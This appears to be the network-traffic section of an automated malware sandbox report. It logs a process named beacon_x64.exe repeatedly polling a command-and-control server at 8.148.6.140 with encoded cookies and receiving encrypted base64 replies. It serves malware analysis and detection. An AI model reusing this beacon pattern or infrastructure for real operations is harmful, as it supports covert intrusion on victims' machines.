          Data Raw: 65 55 79 6c 36 47 69 62 48 42 46 50 35 6f 41 75 64 76 6d 54 59 51 72 33 54 72 49 77 4f 76 78 44 44 36 52 64 44 49 4b 51 51 64 4d 33 4d 4a 4e 6e 6c 4c 69 61 6b 36 68 6a 70 64 31 59 49 6d 43 68 46 2b 76 6b 59 68 51 66 7a 52 51 56 63 4f 38 37 36 42 48 68 6c 31 55 6a 64 39 38 7a 30 6d 49 75 50 33 68 77 55 30 4d 55 32 53 4f 2b 6d 38 59 79 72 42 53 57 6e 66 2b 78 4d 62 67 7a 48 36 6e 6b 42 54 32 74 65 53 34 53 32 59 4f 44 46 31 74 32 52 79 4c 33 72 36 48 56 34 73 34 30 2f 4c 5a 54 67 67 79 43 52 61 4c 76 34 5a 64 4a 38 71 46 52 6d 31 4f 2f 31 6f 77 73 54 33 64 62 4e 51 63 43 31 56 69 59 48 2f 6e 41 31 39 6d 78 6d 62 4e 64 5a 6c 70 31 6a 77 3d 3d
          Data Ascii: eUyl6GibHBFP5oAudvmTYQr3TrIwOvxDD6RdDIKQQdM3MJNnlLiak6hjpd1YImChF+vkYhQfzRQVcO876BHhl1Ujd98z0mIuP3hwU0MU2SO+m8YyrBSWnf+xMbgzH6nkBT2teS4S2YODF1t2RyL3r6HV4s40/LZTggyCRaLv4ZdJ8qFRm1O/1owsT3dbNQcC1ViYH/nA19mxmbNdZlp1jw==


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          15192.168.2.6498858.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:25:29.466532946 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:25:30.456492901 CET357INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:25:30 GMT
          Server: nginx
          Content-Length: 172
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 6e 7a 37 71 72 48 2b 43 72 42 69 61 35 6f 5a 38 49 54 47 6e 52 2b 46 47 49 59 69 5a 4e 43 79 45 64 4e 61 52 52 4c 4a 76 53 39 65 51 42 72 36 52 32 77 4a 41 30 6b 7a 57 59 78 50 6b 52 46 4e 2b 42 6a 63 65 77 55 56 6c 38 7a 75 33 50 6b 67 46 51 6d 43 48 45 61 32 62 71 41 46 41 74 6d 49 45 50 58 63 6a 42 73 63 75 2f 4c 74 62 39 71 47 52 54 35 4f 79 64 30 43 7a 65 76 4a 33 2b 64 62 38 43 32 4c 59 2b 39 32 68 6d 38 67 59 76 67 6a 30 74 7a 30 77 78 33 5a 47 4b 4a 52 6f 6c 66 61 31 6e 6e 7a 78 53 51 36 78 71 37 77 3d
          Data Ascii: nz7qrH+CrBia5oZ8ITGnR+FGIYiZNCyEdNaRRLJvS9eQBr6R2wJA0kzWYxPkRFN+BjcewUVl8zu3PkgFQmCHEa2bqAFAtmIEPXcjBscu/Ltb9qGRT5Oyd0CzevJ3+db8C2LY+92hm8gYvgj0tz0wx3ZGKJRolfa1nnzxSQ6xq7w=


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          16192.168.2.6498918.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:25:30.580194950 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          17192.168.2.6499188.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:25:34.707501888 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:25:35.672286987 CET185INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:25:35 GMT
          Server: nginx
          Content-Length: 108
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Jan 10, 2025 09:25:35.672787905 CET108INData Raw: 71 61 4d 41 34 39 53 45 30 4c 75 66 4c 78 67 76 63 62 66 41 72 39 56 2b 70 74 66 31 33 73 31 76 71 52 75 66 32 6e 72 36 69 78 55 51 44 68 4b 62 67 35 56 52 78 41 4e 6c 2b 6e 67 68 78 6a 55 41 35 46 76 4f 55 54 78 67 51 46 32 54 32 50 36 4f 74 59
          Data Ascii: qaMA49SE0LufLxgvcbfAr9V+ptf13s1vqRuf2nr6ixUQDhKbg5VRxANl+nghxjUA5FvOUTxgQF2T2P6OtYdelpNw2Lysf28rJIL3fTe0lio=


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          18192.168.2.6499278.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:25:35.797630072 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          19192.168.2.6499518.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:25:39.966686964 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:25:40.969285011 CET313INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:25:40 GMT
          Server: nginx
          Content-Length: 128
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 46 4d 2f 30 45 75 42 62 70 45 65 39 75 50 54 46 47 6a 50 31 6d 68 36 31 65 31 50 31 56 4c 49 48 71 4c 4d 4a 63 46 30 68 6f 55 75 36 42 45 43 68 7a 30 6b 6a 53 49 48 68 6b 2f 46 66 42 63 77 58 6b 53 39 4a 51 4e 73 48 37 36 39 6f 65 65 36 2b 4b 76 34 41 67 4d 64 4a 59 73 34 30 46 46 45 6b 66 67 78 41 4d 6c 56 6e 5a 63 67 50 6a 4e 6d 77 54 50 4d 6f 48 6a 64 37 33 57 4d 2b 51 4f 76 45
          Data Ascii: FM/0EuBbpEe9uPTFGjP1mh61e1P1VLIHqLMJcF0hoUu6BEChz0kjSIHhk/FfBcwXkS9JQNsH769oee6+Kv4AgMdJYs40FFEkfgxAMlVnZcgPjNmwTPMoHjd73WM+QOvE


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          20192.168.2.6499618.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:25:41.091602087 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:25:42.065077066 CET441INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:25:41 GMT
          Server: nginx
          Content-Length: 256
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 6d 59 48 41 74 4e 71 66 31 77 5a 33 6d 70 65 6c 59 55 6c 51 72 43 59 65 66 38 62 55 54 44 62 6d 58 70 6c 59 4d 2f 5a 51 78 31 52 67 37 31 6b 63 76 49 72 7a 42 6c 31 46 55 36 46 50 41 48 55 48 77 55 65 39 53 46 66 64 51 32 70 30 36 63 54 36 52 76 6a 68 69 38 5a 53 70 31 56 65 4d 66 53 58 63 55 76 73 5a 6b 44 35 52 6d 38 6f 52 32 75 43 54 63 68 6b 4a 69 36 43 44 53 67 57 47 4d 66 37 62 32 45 6f 39 63 70 52 4c 4a 4c 55 48 42 4f 46 6b 50 6e 47 6f 30 54 79 34 33 64 45 78 70 32 71 76 61 45 70 38 6b 58 75 76 65 33 55 55 43 46 65 44 5a 41 42 56 41 74 6f 33 34 38 41 6d 68 6e 56 5a 35 5a 6c 61 53 4f 56 61 70 4b 63 30 7a 79 36 32 43 69 33 44 70 54 55 39 45 52 63 6b 77 2b 6d 56 56 4a 75 64 39 76 7a 4e 2b 69 4e 41 47 45 46 6e 37 35 43 55 2f 62 49 43 33 43 45 48 79 37 77
          Data Ascii: mYHAtNqf1wZ3mpelYUlQrCYef8bUTDbmXplYM/ZQx1Rg71kcvIrzBl1FU6FPAHUHwUe9SFfdQ2p06cT6Rvjhi8ZSp1VeMfSXcUvsZkD5Rm8oR2uCTchkJi6CDSgWGMf7b2Eo9cpRLJLUHBOFkPnGo0Ty43dExp2qvaEp8kXuve3UUCFeDZABVAto348AmhnVZ5ZlaSOVapKc0zy62Ci3DpTU9ERckw+mVVJud9vzN+iNAGEFn75CU/bIC3CEHy7w


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          21192.168.2.6499688.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:25:42.185496092 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:25:44.532581091 CET549INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:25:44 GMT
          Server: nginx
          Content-Length: 364
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 78 2f 34 41 6f 45 4e 69 6f 67 6c 4c 77 6e 73 4c 33 69 39 4e 52 58 4d 74 58 76 51 68 64 6e 42 66 56 73 57 52 71 54 63 71 67 30 42 46 61 64 51 34 69 54 4c 50 2b 4e 51 70 45 5a 6b 69 78 49 77 52 64 56 48 62 53 51 50 43 52 33 52 42 4b 45 6d 41 52 61 46 51 64 79 32 79 63 4a 67 63 45 58 30 61 33 6b 73 36 2b 49 36 43 69 69 77 76 37 69 31 2f 72 57 49 57 4f 30 7a 52 6f 79 54 30 32 68 59 47 4d 75 66 72 71 30 64 30 79 31 6f 6a 45 61 46 31 49 39 77 36 2f 67 4a 73 72 6c 67 79 4e 39 5a 67 38 38 6a 51 78 7a 6b 65 42 77 6b 71 54 58 68 76 34 2b 41 4e 32 4b 64 56 52 33 2b 77 37 34 68 41 63 57 7a 6e 53 41 32 6c 4e 52 69 54 6a 67 72 76 4f 46 30 33 47 78 58 44 69 48 66 51 7a 7a 32 52 36 63 70 50 50 55 32 7a 73 59 59 4b 2f 49 50 69 2b 4c 50 68 46 41 39 77 36 69 37 72 72 38 6a 66 34 47 58 2b 39 53 58 63 36 74 6b 64 51 69 38 38 4d 61 74 41 69 36 72 6b 65 4c 32 57 61 6a 55 59 5a 35 6d 72 6b 2f 78 44 37 35 6b 6b 53 38 4f 6c 39 34 57 36 4a 4b 70 64 4b 57 4b 52 4e 46 31 4f 54 30 58 41 5a 2b 42 59 41 43 76 45 30 5a 46 50 53 71 [TRUNCATED]
          Data Ascii: x/4AoENioglLwnsL3i9NRXMtXvQhdnBfVsWRqTcqg0BFadQ4iTLP+NQpEZkixIwRdVHbSQPCR3RBKEmARaFQdy2ycJgcEX0a3ks6+I6Ciiwv7i1/rWIWO0zRoyT02hYGMufrq0d0y1ojEaF1I9w6/gJsrlgyN9Zg88jQxzkeBwkqTXhv4+AN2KdVR3+w74hAcWznSA2lNRiTjgrvOF03GxXDiHfQzz2R6cpPPU2zsYYK/IPi+LPhFA9w6i7rr8jf4GX+9SXc6tkdQi88MatAi6rkeL2WajUYZ5mrk/xD75kkS8Ol94W6JKpdKWKRNF1OT0XAZ+BYACvE0ZFPSqmjDxOvk/5iKUolFGgJCutITyo=


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          22192.168.2.6499838.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:25:44.654841900 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:25:45.650706053 CET313INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:25:45 GMT
          Server: nginx
          Content-Length: 128
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 6f 67 42 32 67 35 38 4f 68 59 48 6b 76 67 79 58 67 6f 7a 54 56 2b 6f 2b 55 35 71 62 53 72 51 39 55 78 51 46 44 32 37 30 6f 58 6b 5a 2f 37 6c 74 65 53 61 36 76 79 44 68 6b 6b 4a 38 6f 4e 39 57 31 74 6b 39 79 31 47 7a 79 34 6d 4b 49 55 67 4a 65 7a 6e 6d 52 6b 42 74 65 31 5a 4c 34 4a 31 66 49 67 45 35 6e 53 7a 33 41 72 52 43 32 56 78 43 67 30 61 4b 32 59 44 6b 4f 68 6d 69 57 52 6d 61
          Data Ascii: ogB2g58OhYHkvgyXgozTV+o+U5qbSrQ9UxQFD270oXkZ/7lteSa6vyDhkkJ8oN9W1tk9y1Gzy4mKIUgJeznmRkBte1ZL4J1fIgE5nSz3ArRC2VxCg0aK2YDkOhmiWRma


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          23192.168.2.6499938.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:25:45.763552904 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:25:46.759440899 CET185INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:25:46 GMT
          Server: nginx
          Content-Length: 344
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Jan 10, 2025 09:25:46.759577036 CET344INData Raw: 67 7a 6e 6f 64 71 38 6f 75 5a 34 50 6b 66 55 47 36 59 45 7a 4e 55 35 31 45 75 6a 65 52 65 6b 6a 69 54 4c 6a 63 6a 64 65 59 72 43 54 73 6b 6c 35 6f 74 48 78 5a 36 76 55 53 79 74 51 47 53 37 56 6c 66 35 68 6e 5a 70 4d 61 43 66 4b 6e 55 6c 48 47 72
          Data Ascii: gznodq8ouZ4PkfUG6YEzNU51EujeRekjiTLjcjdeYrCTskl5otHxZ6vUSytQGS7Vlf5hnZpMaCfKnUlHGrAO6fgxoL+iOBwLsayIeWBh4g+GgkuA46wSv3eAlA8fZYY8i8M5ZwyI+C4ERCvfqi6ZEEp24nhFFx5EOM6EW2GF+lNdVaPhrjzy0ivN8o0sUcdNZ0txNc6/aQyUZZovuO2xEpRivWvGFjVT+ZZ8a/jkGwqzg2+pxw8


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          24192.168.2.6500008.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:25:46.872667074 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          25192.168.2.6500098.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:25:51.138451099 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:25:52.697487116 CET505INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:25:52 GMT
          Server: nginx
          Content-Length: 320
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 2b 64 65 6d 33 37 4b 51 58 71 32 37 30 54 73 43 41 53 51 6f 65 4e 71 52 33 6d 37 37 4c 30 6a 59 34 75 4b 66 73 63 46 53 79 2b 65 39 6e 32 74 59 30 61 51 6d 37 39 52 54 63 54 5a 50 2b 4b 4f 54 44 33 38 48 69 56 4a 2f 6f 50 51 52 38 46 59 78 54 45 59 37 4a 41 47 4e 59 6f 30 59 53 57 31 6d 77 32 42 70 79 55 35 39 6b 61 76 43 5a 2b 57 37 62 41 58 67 68 4d 39 44 35 30 6f 68 49 42 69 67 6b 38 4d 69 43 4f 38 33 73 78 4c 49 55 69 49 7a 75 52 70 4a 38 59 77 62 42 63 57 6b 58 53 48 4b 2b 30 69 31 52 57 5a 64 71 4e 65 70 33 71 4f 31 64 57 30 49 34 7a 65 45 63 6a 4d 57 62 73 65 32 6c 76 73 64 79 63 43 49 6b 64 30 66 49 43 58 30 65 42 54 39 76 31 59 6f 4d 4e 48 42 6c 74 5a 30 4b 7a 64 41 7a 53 49 48 48 4b 2f 78 4f 4f 37 48 6f 73 30 72 76 44 73 46 2b 36 67 36 37 45 2f 2f 33 5a 37 2f 65 76 77 36 4b 46 71 66 66 73 43 41 57 4e 6f 76 67 71 46 72 63 45 59 68 71 31 49 79 33 70 42 39 67 39 37 46 51 31 45 36 56 36 37 72 4a 73 6d 49 63 43 38 33 53 61 5a 5a 53 74 71 4d
          Data Ascii: +dem37KQXq270TsCASQoeNqR3m77L0jY4uKfscFSy+e9n2tY0aQm79RTcTZP+KOTD38HiVJ/oPQR8FYxTEY7JAGNYo0YSW1mw2BpyU59kavCZ+W7bAXghM9D50ohIBigk8MiCO83sxLIUiIzuRpJ8YwbBcWkXSHK+0i1RWZdqNep3qO1dW0I4zeEcjMWbse2lvsdycCIkd0fICX0eBT9v1YoMNHBltZ0KzdAzSIHHK/xOO7Hos0rvDsF+6g67E//3Z7/evw6KFqffsCAWNovgqFrcEYhq1Iy3pB9g97FQ1E6V67rJsmIcC83SaZZStqM


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          26192.168.2.6500108.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:25:52.810017109 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:25:53.808669090 CET421INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:25:53 GMT
          Server: nginx
          Content-Length: 236
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 69 5a 4b 4a 34 70 50 4d 6d 43 2b 33 41 67 77 51 53 44 6e 77 44 74 7a 61 54 4d 4a 32 69 4d 46 49 7a 6d 73 69 36 37 68 79 56 2f 70 72 39 6f 6e 35 39 44 66 32 44 66 4f 41 48 74 36 38 4a 68 68 78 4e 72 56 66 70 68 79 59 6c 54 4e 2f 4f 56 7a 35 55 38 50 4d 50 47 57 35 54 42 6e 54 43 58 4a 33 6d 79 6a 6c 31 57 34 6a 57 38 63 47 4b 4d 55 43 2f 71 75 79 44 75 51 34 50 79 52 63 57 35 59 6f 4a 54 6a 76 52 68 39 57 50 50 7a 78 4a 6d 47 73 51 36 31 45 4b 2f 2b 77 57 52 46 52 36 78 67 75 31 2f 58 69 30 79 52 54 59 6b 66 5a 56 63 2b 74 36 61 57 65 30 5a 5a 70 75 32 79 76 4c 55 73 55 30 32 30 34 35 2b 54 50 31 6c 43 63 4f 56 6e 6e 67 32 62 62 36 41 73 67 77 67 31 4c 75 4a 4e 52 6f 43 58 37 65 6f 6b 56 6d 47 45 3d
          Data Ascii: iZKJ4pPMmC+3AgwQSDnwDtzaTMJ2iMFIzmsi67hyV/pr9on59Df2DfOAHt68JhhxNrVfphyYlTN/OVz5U8PMPGW5TBnTCXJ3myjl1W4jW8cGKMUC/quyDuQ4PyRcW5YoJTjvRh9WPPzxJmGsQ61EK/+wWRFR6xgu1/Xi0yRTYkfZVc+t6aWe0ZZpu2yvLUsU02045+TP1lCcOVnng2bb6Asgwg1LuJNRoCX7eokVmGE=


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          27192.168.2.6500118.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:25:53.923063993 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:25:54.939260960 CET293INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:25:54 GMT
          Server: nginx
          Content-Length: 108
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 48 6c 53 47 6f 4a 51 6d 61 50 35 37 70 74 6d 61 42 46 54 46 31 4e 5a 4c 50 41 66 45 70 66 4d 51 42 48 48 43 48 50 2b 45 6a 49 56 34 71 34 76 6e 51 56 62 37 2b 5a 6a 55 78 58 49 46 49 4b 50 6b 71 65 72 44 36 59 5a 53 49 69 31 31 36 71 36 74 58 6b 74 67 6e 32 35 67 62 73 71 49 6f 6b 4a 62 73 71 4e 39 32 30 49 38 51 75 49 3d
